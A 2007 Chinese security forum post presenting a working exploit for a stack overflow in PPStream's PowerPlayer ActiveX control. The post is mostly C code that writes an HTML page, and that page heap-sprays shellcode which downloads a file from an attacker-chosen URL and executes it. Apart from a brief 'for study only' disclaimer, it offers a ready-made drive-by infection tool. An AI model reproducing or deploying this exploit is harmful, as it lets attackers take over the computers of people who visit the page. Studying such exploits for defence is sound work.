PPStream 最新版堆栈溢出利用

标题： PPStream 最新版堆栈溢出利用
作者：dummy
时间：2007-08-19 12:34
链接：http://bbs.pediy.com/showthread.php?t=49949

// 昨天无聊，搞了一下 PPStream。发现其有很多的编码问题。
// 其中好多接口方法都没有严格检查参数，堆溢出和栈溢出都有, 。
// PowerList.ocx, PowerPlayer.dll 都有此类问题, 这里利用的是 PowerPlayer.dll  中的栈溢出。
// 只用于交流学习用，不要用于xx, 否则后果自负。
// 附:最近老是贴代码，这因为自己的表达能力就只要这些了

#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] =
{
  // 必须是偶数大小
  0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
  0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
  0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
  0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
  0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
  0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
  0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
  0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
  0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
  0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
  0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
  "<html><body><object id=\"ppc\" classid=\"clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458\"></object><script>"
  "var shellcode = unescape(\"";
const char* script2 = \
  "\");"
  "bigblock = unescape(\"%u9090\");"
  "headersize = 20;"
  "slackspace = headersize + shellcode.length;"
  "while ( bigblock.length < slackspace ) bigblock += bigblock;"
  "fillblock = bigblock.substring(0, slackspace);"
  "block = bigblock.substring(0, bigblock.length - slackspace);"
  "while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
  "memory = new Array();"
  "for (x=0; x< 400; x++) memory[x] = block + shellcode;"
  "var buffer = '\\x0a';"
  "while (buffer.length < 500) buffer += '\\x0a\\x0a\\x0a\\x0a';"
  "ppc.Logo = buffer;"
  "</script>"
  "</body>"
  "</html>";

int main(int argc, char* argv[])
{
  if ( argc != 2 )
  {
    printf("ex:fuckpps url\nwritten by dummyz@126.com (2007)\n");
    return -1;
  }

  FILE *file = fopen("fuckpps.html", "w+");
  if ( file == NULL )
  {
    printf("create 'fuckpps.html' failed!\n");
    return -2;
  }

  fprintf(file, "%s", script1);
  for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
    fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);

  const unsigned l = strlen(argv[1]);
  for ( unsigned j = 0; j < l; j += 2 )
    fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);

  fprintf(file, "%s", script2);
  fclose(file);

  printf("make 'fuckpps.html' successed!\n");

  return 0;
}